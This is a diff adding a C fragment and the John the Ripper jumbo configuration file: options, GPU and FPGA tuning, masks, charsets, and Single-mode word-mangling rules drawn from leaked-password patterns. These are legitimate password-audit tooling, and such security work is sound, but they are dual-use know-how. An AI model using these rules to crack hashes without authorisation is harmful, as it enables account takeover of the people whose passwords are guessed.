+	/* Zoom the word_rotchars_pos to the hybrid_resume iteration */
+	i=0;
+	wrc = word_rot_current;
+
+	while (i < word_rot_count)
+	{
+		j = word_rot_pos[i];
+
+		/* Rotate this position */
+		word_rotchars_pos[i] = rot_pos[j] + (wrc % rot_len[j]);
+		wrc = wrc / rot_len[j];
+
+		i++;
+	}
+}
@@ -0,0 +1,3899 @@
+#
+# This file is part of John the Ripper password cracker,
+# Copyright (c) 1996-2006,2008-2013 by Solar Designer
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# There's ABSOLUTELY NO WARRANTY, express or implied.
+#
+# Please note that although this configuration file is under the cut-down BSD
+# license above, many source files in John the Ripper are under GPLv2.
+# For licensing terms for John the Ripper as a whole, see doc/LICENSE.
+#
+# ...with changes in the jumbo patch, by various authors
+#
+
+# The [Options] section is for general options only.
+# Note that MPI specific options have been moved
+# to [Options.MPI]
+# There is also a new section [Options.OpenCL]
+# for OpenCL specific options
+# Default settings for Markov mode have been moved
+# to [Markov.Default], but you can define other
+# Markov modes as well, see ../doc/MARKOV
+[Options]
+# Default wordlist file name (including in batch mode)
+Wordlist = $JOHN/password.lst
+# Use idle cycles only
+Idle = Y
+# Crash recovery file saving delay in seconds
+Save = 60
+# Beep when a password is found (who needs this anyway?)
+Beep = N
+# if set to Y then dynamic format will always work with bare hashes. Normally
+# dynamic only uses bare hashes if a single dynamic type is selected with
+# the -format=  (so -format=dynamic_0 would use valid bare hashes).
+DynamicAlwaysUseBareHashes = N
+
+# Default Single mode rules
+SingleRules = Single
+
+# Default batch mode Wordlist rules
+BatchModeWordlistRules = Wordlist
+
+# Default wordlist mode rules when not in batch mode (if any)
+# If this is set and you want to run once without rules, use --rules:none
+#WordlistRules = Wordlist
+
+# Default loopback mode rules (if any)
+# If this is set and you want to run once without rules, use --rules:none
+LoopbackRules = Loopback
+
+# Max. number of times to warn about crypting suboptimally small batches,
+# before suppressing the warnings.
+MaxKPCWarnings = 10
+
+# If set to true, relax the KPC warning checks and only warn for really
+# bad situations (the fewer salts, the more slack).
+RelaxKPCWarningCheck = N
+
+# Default/batch mode Incremental mode
+# Warning: changing these might currently break resume on existing sessions
+DefaultIncremental = ASCII
+#DefaultIncrementalUTF8 = UTF8
+DefaultIncrementalLM = LM_ASCII
+
+# Time formatting string used in status ETA.
+#
+# TimeFormat24 is used when ETA is within 24h, so it is possible to omit
+# the date then if you like, and show seconds instead.
+#
+# %c  means 'local' specific canonical form, such as:
+# 05/06/11 18:10:34
+#
+# Other examples
+# %d/%m/%y %H:%M   (day/mon/year hour:min)
+# %m/%d/%y %H:%M   (mon/day/year hour:min)
+# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
+TimeFormat = %Y-%m-%d %H:%M
+TimeFormat24 = %H:%M:%S
+
+#
+# optional add a date timestamp in front of every logged line.
+# the default is no timestamp logging. See the docs for
+# strftime for more information:
+# http://en.cppreference.com/w/c/chrono/strftime
+#
+# 2016-02-20T22:35:38+01:00 would be %Y-%m-%dT%H:%M:%S%z
+# Feb 20 22:35:38           would be %b %d %H:%M:%S
+#LogDateFormat = %Y-%m-%dT%H:%M:%S%z
+
+# if log date is being used, the time will default to local
+# time.  But if the next line is uncommented, it will output
+# in UTC.  Note, if LogDateFormat is not set, this option
+# does nothing.
+#LogDateFormatUTC = Y
+
+# if logging to stderr (--log-stderr command line switch used),
+# then use date format when outputting to the stderr.
+#LogDateStderrFormat = %b %d %H:%M:%S
+
+# This can be used to colorize (on screen) or otherwise emphasize (in log
+# files) output whenever a supposed administrator password gets cracked.
+#
+# Set this to N or comment it out to disable all "MarkAdmin" stuff.
+MarkAdminCracks = Y
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for
+# terminal output. The default is to change color to red before the username
+# and reset to normal after it. Any "^" characters will be parsed as ESC for
+# use in ANSI codes (like in the defaults)
+MarkAdminStart = ^[31m
+MarkAdminEnd = ^[0m
+
+# If MarkAdminCracks = Y above, the below will be used (if defined) for logs.
+# This literal string will be printed after the " + Cracked: root" line.
+MarkAdminString = (ADMIN ACCOUNT)
+
+# Permissions to set for session.log file
+# Default is 0600
+#LogFilePermissions = 0600
+
+# Permissions to set for POT file
+# Default is 0600
+#PotFilePermissions = 0600
+
+# John exits if another user owns log or pot file because CHMOD fails,
+# If this is set John prints a warning and continues
+# Default is N
+#IgnoreChmodErrors = N
+
+# This figure is in MB. The default is to memory map wordlists not larger
+# than one terabyte.
+# Set this to 0 to disable any use of memory-mapping in wordlist mode.
+WordlistMemoryMapMaxSize = 1048576
+
+# For single mode, load the full GECOS field (before splitting) as one
+# additional candidate. Normal behavior is to only load individual words
+# from that field. Enabling this can help when this field contains email
+# addresses or other strings that are better used unsplit, but it increases
+# the number of words tried so it may also slow things down.
+PristineGecos = N
+
+# Add an extra pass when loading Single words, that tries to parse things
+# like JEdgarHoover to J Edgar Hoover and so on.
+JumboSingleWords = N
+
+# For single mode, ignore the login field.
+# Normal behavior is to use the login field for single mode.
+# Skipping the login field should only be enabled if previous single mode
+# sessions did already make use of the login field, but no other information,
+# and now you want to use other information, skip the login field, but still
+# want the login field to be reported on successful cracks or with --show.
+SingleSkipLogin = N
+
+# Over-ride SINGLE_WORDS_PAIR_MAX in params.h.  This may slow down Single mode
+# but it may also help cracking a few more candidates.  Default in core John
+# is 4 while the Jumbo default is 6.  This limit is automagically increased
+# by word seed options --single-seed and/or --single-wordlist if needed.
+SingleWordsPairMax = 6
+
+# Un-commenting this stops Single mode from re-testing guessed plaintexts
+# with all other salts.
+#SingleRetestGuessed = N
+
+# Set the maximum word buffer size used by Single mode. The default is
+# 4 GB. If running fork this is the *total* used by a session (size is
+# divided by number of forks). If running MPI, we try to determine the
+# number of local processes on each node and divide it accordingly.
+SingleMaxBufferSize = 4
+
+# When running single mode with a GPU or accelerator, we prioritize speed
+# (saturating buffers) over resume ability:  When resuming such a session
+# it may take longer to catch up.  Set this option to Y to prioritize
+# resuming instead, at the cost of max. speed.
+SinglePrioResume = N
+
+# Protect the restore files (*.rec) from being overwritten. The default
+# mode is "Disabled". This mode will provide no protection, but has been
+# the default mode in JtR forever, so to not change behavior, that mode
+# has been kept as default.  You can change this to "Named" or "Always"
+# If this option is changed to "Named", then any restore file created
+# with a --session=xxxx will be protected from being overwritten. If
+# the option is set to "Always", then all .rec files will be kept from
+# being overwritten, even ${JOHN}/john.rec file
+#SessionFileProtect = Named
+
+# Protect the log files (*.log) from being reused by new sessons.
+# The default mode is "Disabled". That means, a nee session will just append
+# to an existing log file.
+# With "Named", a new session will not be allowed to append to an existing
+# log file, except if the --session=NAME option hasn't been used.
+# With "Always", not even the default log file ${JOHN}/john.log can be
+# reused by a new session.
+# (Of course, a restored session will always be allowed to append to an
+# existing log file.)
+# Unless you use the --nolog option, setting LogFileProtect will also
+# prevent overwriting existing session files.
+#LogFileProtect = Named
+
+# Emit a status line whenever a password is cracked (this is the same as
+# passing the --crack-status option flag to john). NOTE: if this is set
+# to true here, --crack-status will toggle it back to false.
+CrackStatus = N
+
+# When printing status, show number of candidates tried (eg. 123456p).
+# This is added to the "+ Cracked" line in the log as well (and that figure
+# will be exact while the screen output will be a multiple of batch size).
+StatusShowCandidates = N
+
+# Write cracked passwords to the log file (default is just the user name)
+LogCrackedPasswords = N
+
+# Disable the dupe checking when loading hashes. For testing purposes only!
+NoLoaderDupeCheck = N
+
+# Default encoding for input files (ie. login/GECOS fields) and wordlists
+# etc.  If this is not set here and --encoding is not used either, the default
+# is ISO-8859-1 for Unicode conversions and 7-bit ASCII encoding is assumed
+# for rules, e.g., uppercasing of letters other than a-z will not work at all!
+DefaultEncoding = UTF-8
+
+# Default --target-encoding for Microsoft hashes (LM, NETLM et al) when input
+# encoding is UTF-8. CP850 would be a universal choice for covering most
+# "Latin-1" countries.
+DefaultMSCodepage = CP850
+
+# Default internal legacy codepage to be used by mask mode and within the
+# rules engine, when both input and target encodings are Unicode (eg. UTF-8
+# wordlist and NT hashes). In some cases this hits performance but lets us
+# do things like Unicode case conversions. You can pick any supported
+# legacy codepage that has as much support for the input data as possible,
+# e.g., for "Latin-1" language passwords you can use ISO-8859-1, CP850 or
+# CP1252 and it will hardly make any difference but in some cases, ISO-8859-1
+# is fastest. Using "UTF-8" (which is not a legacy codepage!) will disable.
+#
+# The default is to NOT use any internal codepage.
+#DefaultInternalCodepage = ISO-8859-1
+
+# Warn if seeing UTF-8 when expecting some other encoding, or vice versa.
+# This is disabled for ASCII or RAW encodings, for performance.
+WarnEncoding = Y
+
+# Always report (to screen and log) cracked passwords as UTF-8, regardless of
+# input encoding. This is recommended if you have your terminal set for UTF-8.
+AlwaysReportUTF8 = Y
+
+# Always store Unicode (UTF-16) passwords as UTF-8 in john.pot, regardless
+# of input encoding. This prevents john.pot from being filled with mixed
+# and eventually unknown encodings. This is recommended if you have your
+# terminal set for UTF-8 and/or you want to run --loopback for LM->NT
+# including non-ASCII.
+UnicodeStoreUTF8 = Y
+
+# Always report/store non-Unicode formats as UTF-8, regardless of input
+# encoding. Note: The actual codepage that was used is not stored anywhere
+# except in the log file.
+# This is needed e.g. for --loopback to crack LM->NT including non-ASCII.
+CPstoreUTF8 = Y
+
+# Normally, we try to handle Unicode characters not in our selected codepage
+# with best effort. Enabling this option will instead translate any such
+# character to "?" (default), to meet certain formats' behavior.
+EmulateBrokenEncoding = N
+ReplacementCharacter = ?
+
+# Default verbosity is 3, valid figures are 1-5 right now.
+# 4-5 enables some extra output and diagnostics.
+# 4 is same verbosity as "john proper" aka. non-jumbo.
+# 3 mutes rules & incremental output in logs (LOTS of lines).
+# 2 mutes some other diagnostics.
+# 1 even mutes printing (to screen) of cracked passwords.
+Verbosity = 3
+
+# If set to Y, do not output, log  or store cracked passwords verbatim.
+# This implies a different default .pot database file "secure.pot" instead
+# of "john.pot" but it can still be overridden using --pot=FILE.
+# This also overrides other options, e.g. LogCrackedPasswords.
+SecureMode = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has written cracks to the pot file, so they will re-sync. Note that this
+# may be delayed by buffers and the "Save" timer setting near top of this file.
+ReloadAtCrack = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has cracked all hashes (there's nothing more to do!). This is ignored
+# when ReloadAtCrack = Y because it's redundant.
+ReloadAtDone = Y
+
+# If set to Y, resync pot file when saving session. This does not involve any
+# signalling, we just detect that someone else wrote to the pot file.
+# This will sync with concurrent sessions even when not using --fork or MPI
+# but it may be delayed by the "Save" timer setting near top of this file.
+ReloadAtSave = Y
+
+# If this file exists, john will abort cleanly
+AbortFile = /var/run/john/abort
+
+# While this file exists, john will pause
+PauseFile = /var/run/john/pause
+
+# If set to true, the uid will be appended to user name on cracks
+#   With:     password123      (Administrator:500)
+#   Without   password123      (Administrator)
+# This is disabled by --save-memory.
+ShowUIDinCracks = N
+
+# This sets the "grace time" for --max-run-time=N. If john has not finished
+# this long after the initial abort signal, it will send another one (similar
+# to pressing ctrl-c a second time) which will stop john immediately and not
+# wait further for an optimal resume point.
+# Setting this to 0 means NO grace time - immediately abort. Setting it to
+# a negative number means UNLIMITED grace time - never hard abort.
+AbortGraceTime = 30
+
+# Setting this to true allows SAP-B and SAP-G "half hashes" to be cracked.
+# These are taken from RFC_READ_TABLE and padded with nulls to correct length.
+# This may produce some false positives if enabled, at least for SAP-B.
+SAPhalfHashes = N
+
+# This allows you to list a few words/names that will be used by single mode
+# as if they were included in every GECOS field.  Use sparingly! Please note
+# that the example words are commented out, so the list is empty!
+[List.Single:SeedWords]
+#Pass
+#Secret
+#Test
+
+# This allows you to read extra pot files when loading hashes. Nothing will
+# ever be written to these files, they are just read. Any directory in this
+# list will be traversed and files in it with an extension of .pot will be
+# read. However there will NOT be any recursion down further directory levels.
+# Any entries that don't exist will be silently ignored.
+[List.Extra:Potfiles]
+#somefile.pot
+#somedirectory
+#$JOHN/my.pot
+
+[Options:CPUtune]
+# If preset is given, use it and skip autotune (NOTE: non-intel archs will
+# currently ignore this option and always autotune)
+UsePreset = Y
+# Performance sample time, default 10 ms
+AutoTuneSampleTime = 10
+# Required gain to consider this scale better. Default is 1 %
+AutoTuneReqGain = 1
+# Max crypt_all() duration for trying a higher scale, default 100 ms
+AutoTuneMaxDuration = 100
+# If we tried this many increases of scale w/o gain, give up. Default 3.
+AutoTuneMaxNoProgress = 3
+
+[Options:MPI]
+# Automagically disable OMP if MPI is used (set to N if
+# you want to run one MPI process per multi-core host)
+MPIOMPmutex = Y
+
+# Print a notice if disabling OMP (when MPIOMPmutex = Y)
+# or when running OMP and MPI at the same time
+MPIOMPverbose = Y
+
+# Assume all MPI nodes are homogenous; Enforce same OpenCL workgroup sizes.
+MPIAllGPUsSame = N
+
+# These formats are disabled from all-formats --test runs, or auto-selection
+# of format from an input file. Even when disabled, you can use them as long
+# as you spell them out with the --format option. Or you can delete a line,
+# comment it out, or change to 'N'
+[Disabled:Formats]
+#formatname = Y
+.include '$JOHN/dynamic_disabled.conf'
+
+# Options that may affect both GPUs and other accelerators (eg. FPGA)
+[Options:GPU]
+# Show GPU temperature, fan and utilization along with normal status output
+SensorsStatus = Y
+
+# If SensorsStatus is true, individual ones can be turned off
+TempStatus = Y
+UtilStatus = N
+FanStatus = N
+
+# Abort session if GPU hits this temperature (in C)
+AbortTemperature = 95
+
+
+# ZTEX specific settings
+[ZTEX:descrypt]
+# The design has two programmable clocks. The 1st one is supplied to
+# pipelines of DES rounds, the 2nd clock is supplied to comparators.
+# Startup frequencies are 220,160.
+#Frequency = 220,160
+
+[ZTEX:bcrypt]
+# Define typical setting of hashes it's going to process. It allows
+# to adjust for best performance.
+TargetSetting = 6
+# Startup frequency for bcrypt-ztex is 140. Design tools guaranteed
+# 141.5 in worst-case temperature and voltage.
+Frequency = 141
+# It's possible to set frequency on per-board and per-fpga basis.
+#Frequency_04A36E0FD6 = 142
+#Frequency_04A36E0FD6_0 = 143
+#Frequency_04A36E0FD6_3 = 144
+
+[ZTEX:sha512crypt]
+#TargetRounds = 5000
+# Design tools reported possible frequency to be 215 MHz.
+# We never encountered a board where this worked anywhere close
+# to such high frequency. Default frequency is set to 160 MHz.
+# Some lucky boards might run at some higher frequency.
+Frequency = 160
+#Config1 = \x00\x00
+
+[ZTEX:Drupal7]
+#TargetRounds = 16384
+# Drupal7 uses same bitstream as sha512crypt, see comment regarding
+# default frequency in sha512crypt section.
+#Frequency = 160
+# Some bitstreams accept runtime configuration.
+# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
+# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
+# corresponding unit (there are 10 units in the bitstream).
+# This turns off units 0 and 1.
+#Config1 = \x03\x00
+# This turns off all 10 units (resulting in a timeout).
+#Config1_04A36E0FD6_0 = \xff\x03
+
+[ZTEX:sha256crypt]
+# Design tools reported possible frequency is 166.3 but tested boards
+# miss guesses, often fail unless frequency is decreased.
+#Frequency = 165
+Frequency = 135
+#TargetRounds = 1000000
+
+# md5crypt and phpass use same bitstream. Design tools reported
+# possible frequency is 202 MHz. Tested boards run OK at 180 MHz.
+[ZTEX:md5crypt]
+Frequency = 180
+
+[ZTEX:phpass]
+Frequency = 180
+#TargetRounds = 2048
+
+[Options:OpenCL]
+# Set default OpenCL device. Command line option will override this.
+# If not set, we will search for a GPU or fall-back to the most
+# powerful device.
+#Device = 0
+
+# If commented out and set to true, store LWS and GWS in session file for
+# later resume. Note that when resuming, this option is ignored: If the
+# session file was written with this option set, it will still be used.
+#ResumeWS = Y
+
+# Global max. single kernel invocation duration, in ms. Setting this low
+# (eg. 10-100 ms) gives you a better responding desktop but lower performance.
+# Setting it high (eg. 200-500 ms) will maximize performance but your desktop
+# may lag. Really high values may trip watchdogs (eg. 5 seconds). Some versions
+# of AMD Catalyst may hang if you go above 200 ms, and in general any good
+# kernel will perform optimally at 100-200 ms anyway.
+#Global_MaxDuration = 200
+
+# Some formats vectorize their kernels in case the device says it's a good
+# idea. Some devices give "improper" hints which means we vectorize but get
+# a performance drop. If you have such a device, uncommenting the below
+# will disable vectorizing globally.
+# With this set to N (or commented out) you can force it per session with
+# the --force-scalar command-line option instead.
+#ForceScalar = Y
+
+# Global build options. Format-specific build options below may be
+# concatenated to this.
+GlobalBuildOpts = -cl-mad-enable
+
+# Initial local work-size for auto-tune (CPU devices excepted).
+# 0 means let the OpenCL implementation pick a suitable value.
+# 1 means query for "best multiple" (usually corresponds to "warp size").
+# Any other value (eg. 64) will be taken verbatim.
+AutotuneLWS = 1
+
+
+# Format-specific settings:
+
+# Uncomment the below for nvidia sm_30 and beyond.
+# Please, check if it is really better.
+#sha512crypt_BuildOpts = -cl-nv-maxrregcount=80
+
+# Best configuration value to be used at runtime.
+sha512crypt_Bonaire = -DUNROLL_LOOP=132104
+
+# Example: Override auto-tune for RAR format.
+#rar_LWS = 128
+#rar_GWS = 8192
+
+[List.OpenCL:Drivers]
+#Driver ; Description         ; Recommendation
+#AMD driver versions
+938 , 2 ; 12.8                ;
+1084, 4 ; 13.1                ;
+1124, 2 ; 13.4                ;
+1214, 3 ; 13.6 beta           ;
+1311, 2 ; 13.11 beta-1        ;
+1348, 5 ; 13.12               ;
+1445, 5 ; 14.4 (Mantle)       ;
+1526, 3 ; 14.6 beta (Mantle)  ;
+1573, 4 ; 14.9 (Mantle)       ; VGL S
+1642, 5 ; 14.12 (Omega)       ; VGL S
+1702, 3 ; 15.5 beta           ;     T
+1729, 3 ; 15.5                ;
+1800, 5 ; 15.7                ; VG* R
+1800, 8 ; 15.7.1              ; VGW R
+1800, 11; 15.9                ; VGL S
+1912, 5 ; 15.12               ;
+#NVIDIA driver versions
+346, 0  ;                     ; N*  R
+319, 0  ;                     ; N*  S
+#End
+0, 0    ;                     ;
+
+#Labels
+# * -> all OS
+# N -> NVIDIA
+# G -> GCN
+# V -> VLIW4 and VLIW5
+# W -> Windows
+# L -> Linux
+# R -> recommended
+# S -> supported
+# T -> not recommended: really bad software. I mean "trash".
+
+[PRINCE]
+# Default wordlist file name. Will fall back to standard wordlist if not
+# defined.
+#Wordlist = $JOHN/password.lst
+
+
+# Markov modes, see ../doc/MARKOV for more information
+[Markov:Default]
+# Default Markov mode settings
+#
+# Statsfile cannot be specified on the command line, so
+# specifying it here is mandatory
+Statsfile = $JOHN/stats
+# MkvLvl and MkvMaxLen should also be specified here, as a fallback for
+# --markov usage without specifying LEVEL and/or --max-length on the
+# command line.
+MkvLvl = 200
+MkvMaxLen = 12
+# MkvMinLvl and MkvMinLen should not be specified at all in [Markov:Default],
+# or they should be equal to 0 (which is the default if not specified.
+# MkvMinLvl and MkvMinLen can be used in other Markov mode sections
+# except [Markov:Default]
+; MkvMinLvl = 0
+; MkvMinLen = 0
+
+# A user defined character class is named with a single digit, ie. 0..9. After
+# the equal-sign, just list all characters that this class should match. You
+# can specify ranges within brackets, much like pre-processor ranges in rules.
+# BEWARE of encoding if using non-ASCII characters. If you put UTF-8 characters
+# here, it will *not* work! You must use a singlebyte encoding and it should
+# be the same here as you intend to use for your dictionary.
+# You can however put characters here in \xA3 format (for codepoint 0xA3 - in
+# many iso-8859 codepages that would mean a pound sign). This works in ranges
+# too. Using \x00 is not supported though - it will not be parsed as null.
+#
+# This is a couple of example classes:
+# ?0 matches (one version of) base64 characters
+# ?1 matches hex digits
+# ?2 matches the TAB character (never try to use \x00!)
+[UserClasses]
+0 = [a-zA-Z0-9/.]
+1 = [0-9a-fA-F]
+2 = \x09
+
+[Mask]
+# When iterating over length, emit a status line after each length is done
+MaskLengthIterStatus = Y
+
+# Default mask for -mask if none is given. This is same as hashcat's default.
+DefaultMask = ?1?2?2?2?2?2?2?3?3?3?3?d?d?d?d
+
+# Default mask for Hybrid mask mode if none is given.
+DefaultHybridMask = ?w?d?d?d?d
+
+# Mask mode have custom placeholders ?1..?9 that look similar to user classes
+# but are a different thing. They are merely defaults for the -1..-9 command
+# line options. As delivered, they resemble hashcat's defaults.
+1 = ?l?d?u
+2 = ?l?d
+3 = ?l?d*!$@_
+4 =
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Subsets]
+# When iterating over length, emit a status line after each length is done
+LengthIterStatus = Y
+
+# Min/Max number of unique characters. MaxDiff can't be set larger than 16.
+MinDiff = 1
+MaxDiff = 7
+
+# Default charset, either a literal string or a single-digit number pointing
+# to one of the sets below. If not defined, all printable ASCII is used.
+#DefaultCharset = 0
+
+# Subsets mode charsets 0-9. These are literal strings. TAB and space
+# characters can be used as long as they do not come first or last. The only
+# "magic" used here is \U+HHHH or \U+HHHHH for any Unicode character (except
+# the very highest private area that has six hex digits). For example, you
+# could say \U+1F600 for a "Grinning Face".
+0 = 0123456789abcdef
+1 = ABCDEF0123456789
+2 = 0123456789abcdefghijklmnopqrstuvwxyzàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿABCDEFGHIJKLMNOPQRSTUVWXYZÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿
+3 = 0123456789άέήίαβγδεζηθικλμνξοπρςστυφχψωϊϋόύώΆΈΉΊΌΎΏΑΒΓΔΕΖΗΘΙΚΛΜΝΞΟΠΡΣΤΥΦΧΨΩΪΫ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+4 = 0123456789абвгдежзийклмнопрстуфхцчшщъыьэюяёЁАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ№ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Regen_Salts_UserClasses]
+# These are user defined character sets.  Their purpose is to allow custom salt
+# values to be used within the salt_regen logic.  These will be the characters
+# to use for this character within the salt.  So if we had a salt that was 4
+# characters, and 0-9a-m, we can easily do this by 0 = [0-9a-m].  If this is
+# used, the regen salt value would be ?0?0?0?0 and salts such as a47m 2kd5
+# would be valid.
+1 = [1-9]
+
+# A "no rules" rule for eg. super-fast Single mode (use with --single=none)
+[List.Rules:None]
+:
+
+# A "drop all" rule for even faster Single mode (debugging :)
+[List.Rules:Drop]
+<1'0
+
+# These are good rules on larger sites where a user ID may already be used,
+# so a user simply appends numbers to create his loginID, but then uses the
+# login name he wanted as basis for password. Just strip off digits and treat
+# the base-word to some manipulation. These rules found from the 2015 A-M
+# leak.  Only adds 30-50 permutations and only applied to user names that have
+# digits contained within them, and cracks quite a few.
+# These are currently Jumbo-specific.
+[List.Rules:JumboSingle]
+/?d @?d >4
+/?d @?d M @?A >4 Q
+-c /?d @?d >4 M [lc] Q
+-c /?d @?d M @?A >4 Q M [lc] Q
+@?D Q >4
+/?d @?d >3 <* $[0-9] Q
+-c /?d @?d >3 <* M [lc] Q $[0-9]
+/?d @?d >3 <- Az"12" <+ Q
+-c /?d @?d >3 <- M [lc] Q Az"12" <+
+/?d @?d >3 Az"123" <+ Q
+-c /?d @?d >3 M [lc] Q Az"123" <+
+/?d @?d >2 al d
+-c /?d @?d >2 al M [lc] Q d
+(?a )?d /?d a0 'p Xpz0
+)?a (?d /?a a0 'p Xpz0
+
+
+# "Single crack" mode rules
+[List.Rules:Single]
+# Simple rules come first...
+:
+-s x**
+-c (?a c Q
+-c l Q
+-s-c x** /?u l
+# These were not included in crackers I've seen, but are pretty efficient,
+# so I include them near the beginning
+-<6 ->6 >6 '6
+-<7 ->7 >7 '7 l
+-<6 ->6 -c >6 '6 /?u l
+-<5 ->5 >5 '5
+
+# Wedge the Jumbo-specific addons in here!
+.include [List.Rules:JumboSingle]
+
+# Weird order, eh? Can't do anything about it, the order is based on the
+# number of successful cracks...
+al d
+a0 r c
+-c al (?a d c
+-<5 ->5 -c >5 '5 /?u l
+-c a0 u Q
+-c a0 )?a r l
+-[:c] <* !?A \p1[lc] p
+-c al c Q d
+-<7 ->7 -c >7 '7 /?u
+-<4 ->4 >4 '4 l
+-c a0 (?l c r
+-c a0 )?l l Tm
+-<3 ->3 >3 '3
+-<4 ->4 -c >4 '4 /?u
+-<3 ->3 -c >3 '3 /?u l
+-c a0 u Q r
+al d M 'l f Q
+-c al l Q d M 'l f Q
+# About 50% of single-mode-crackable passwords get cracked by now...
+# >2 x12 ... >8 x18
+->[3-9] >\p[2-8] x1\0
+->9 >9 \[
+# >3 x22 ... >9 x28
+->[4-9A] >\p[3-9] x2\p[2-8]
+# >4 x32 ... >9 x37
+->[5-9A] >\p[4-9] x3\p[2-7]
+# >2 x12 /?u l ... >8 x18 /?u l
+-c ->[3-9] >\p[2-8] x1\0 /?u l
+-c ->9 >9 \[ /?u l
+# >3 x22 /?u l ... >9 x28 /?u l
+-c ->[4-9A] >\p[3-9] x2\p[2-8] /?u l
+# >4 x32 /?u l ... >9 x37 /?u l
+-c ->[5-9A] >\p[4-9] x3\p[2-7] /?u l
+# Now to the suffix stuff...
+a1 l $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-c a1 (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-[:c] a1 !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
+-[:c] a1 /?A (?\p1[za] \p1[lc] $s
+a1 l r $[1-9!]
+-c a1 /?a u $[1-9!]
+-[:c] a2 (?\p1[za] \p1[lc] Az"'s"
+-[:c] a2 (?\p1[za] \p1[lc] Az"!!"
+-[:c] a3 (?\p1[za] \p1[lc] Az"!!!"
+# Removing vowels...
+-[:c] b1 /?v @?v >2 (?\p1[za] \p1[lc]
+/?v @?v >2 al d
+# crack -> cracked, crack -> cracking
+<* l [PI]
+-c <* l [PI] (?a c
+# mary -> marie
+-[:c] a1 (?\p1[za] \p1[lc] )y omi $e
+# marie -> mary
+-[:c] b1 (?\p1[za] \p1[lc] )e \] )i val1 oay
+# The following are some 3l33t rules
+-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
+-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
+-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+# Now to the prefix stuff...
+l ^[1a-z2-90]
+-c l Q ^[A-Z]
+^[A-Z]
+l ^["-/:-@\[-`{-~]
+-[:c] <9 (?a \p1[lc] A0"[tT]he"
+-[:c] <9 (?a \p1[lc] A0"[aA]my"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
+-[:c] <9 (?a \p1[lc] A0"__"
+<- !?A l p ^[240-9]
+# Some word pair rules...
+# johnsmith -> JohnSmith, johnSmith
+-p-c (?a 2 (?a c 1 [cl]
+# JohnSmith -> john smith, john_smith, john-smith
+-p 1 <- $[ _\-] + l
+# JohnSmith -> John smith, John_smith, John-smith
+-p-c 1 <- (?a c $[ _\-] 2 l
+# JohnSmith -> john Smith, john_Smith, john-Smith
+-p-c 1 <- l $[ _\-] 2 (?a c
+# johnsmith -> John Smith, John_Smith, John-Smith
+-p-c 1 <- (?a c $[ _\-] 2 (?a c
+# Applying different simple rules to each of the two words
+-p-[c:] 1 \p1[ur] 2 l
+-p-c 2 (?a c 1 [ur]
+-p-[c:] 1 l 2 \p1[ur]
+-p-c 1 (?a c 2 [ur]
+# jsmith -> smithj, etc...
+-[:c] (?a \p1[lc] [{}]
+-[:c] (?a \p1[lc] [{}] \0
+# Toggle case...
+-c <+ )?u l Tm
+-c T0 Q M c Q l Q u Q C Q X0z0 'l
+-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
+-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
+-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
+-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
+# Deleting chars...
+>[2-8] D\p[1-7]
+>[8-9A-E] D\1
+-c /?u >[2-8] D\p[1-7] l
+-c /?u >[8-9A-E] D\1 l
+=1?a \[ M c Q
+-c (?a >[1-9A-E] D\1 c
+# Inserting a dot...
+-[:c] >3 (?a \p1[lc] i[12].
+# More suffix stuff...
+<- l Az"[190][0-9]"
+-c <- (?a c Az"[190][0-9]"
+<- l Az"[782][0-9]"
+-c <- (?a c Az"[782][0-9]"
+<* l $[A-Z]
+-c <* (?a c $[A-Z]
+# cracking -> CRACKiNG
+-c u /I sIi
+# Crack96 -> cRACK96
+%2?a C Q
+# Crack96 -> cRACK(^
+/?A S Q
+# Crack96 -> CRaCK96
+-c /?v V Q
+# Really weird charset conversions, like "england" -> "rmh;smf"
+:[RL] Q
+l Q [RL]
